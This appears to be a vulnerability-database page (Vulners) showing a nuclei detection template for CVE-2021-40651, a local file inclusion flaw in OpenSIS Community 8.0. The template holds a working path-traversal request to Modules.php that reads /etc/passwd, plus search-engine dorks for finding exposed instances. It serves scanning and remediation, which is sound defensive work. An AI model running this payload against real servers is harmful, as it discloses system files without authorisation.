Lucene search
K

OS4Ed OpenSIS Community 8.0 - Local File Inclusion

🗓️ 10 Jul 2026 03:01:38Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 30 Views

OS4Ed OpenSIS Community 8.0 has a local file inclusion vulnerability in Modules.php revealing arbitrary files from the server's filesystem

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-40651
29 Sep 202112:15
attackerkb
Circl
CVE-2021-40651
29 Sep 202116:36
circl
CNNVD
OS4Ed OpenSIS 路径遍历漏洞
29 Sep 202100:00
cnnvd
CVE
CVE-2021-40651
29 Sep 202111:59
cve
Cvelist
CVE-2021-40651
29 Sep 202111:59
cvelist
Exploit DB
OpenSIS 8.0 'modname' - Directory Traversal
3 Sep 202100:00
exploitdb
NVD
CVE-2021-40651
29 Sep 202112:15
nvd
Prion
Design/Logic Flaw
29 Sep 202112:15
prion
id: CVE-2021-40651

info:
  name: OS4Ed OpenSIS Community 8.0 - Local File Inclusion
  author: ctflearner
  severity: medium
  description: |
    OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file.
  impact: |
    Authenticated attackers can read arbitrary files from the server including /etc/passwd via path traversal in the modname parameter.
  remediation: |
    Upgrade to OpenSIS Community version 8.1 or later.
  reference:
    - https://www.exploit-db.com/exploits/50259
    - https://github.com/MiSERYYYYY/Vulnerability-Reports-and-Disclosures/blob/main/OpenSIS-Community-8.0.md
    - https://www.youtube.com/watch?v=wFwlbXANRCo
    - https://nvd.nist.gov/vuln/detail/CVE-2021-40651
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2021-40651
    cwe-id: CWE-22
    epss-score: 0.18415
    epss-percentile: 0.9689
    cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*
  metadata:
    max-request: 2
    vendor: os4ed
    product: opensis
    shodan-query:
      - "title:\"openSIS\""
      - http.title:"opensis"
    fofa-query: title="opensis"
    google-query: intitle:"opensis"
  tags: cve,cve2021,lfi,os4ed,opensis,authenticated,vuln

http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        USERNAME={{username}}&PASSWORD={{password}}&language=en&log=

      - |
        GET /Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - 'contains(body_1, "openSIS")'
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100f15d3c43501d87c294da413b5bcddbf12ba534d6b6cb5a7863d486a4dd88da5502210092e4eded82c337d078c7b1c75c6769d3cac6483405c25b4df95c41581f97acf5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 24
CVSS 3.16.5
EPSS0.18415
30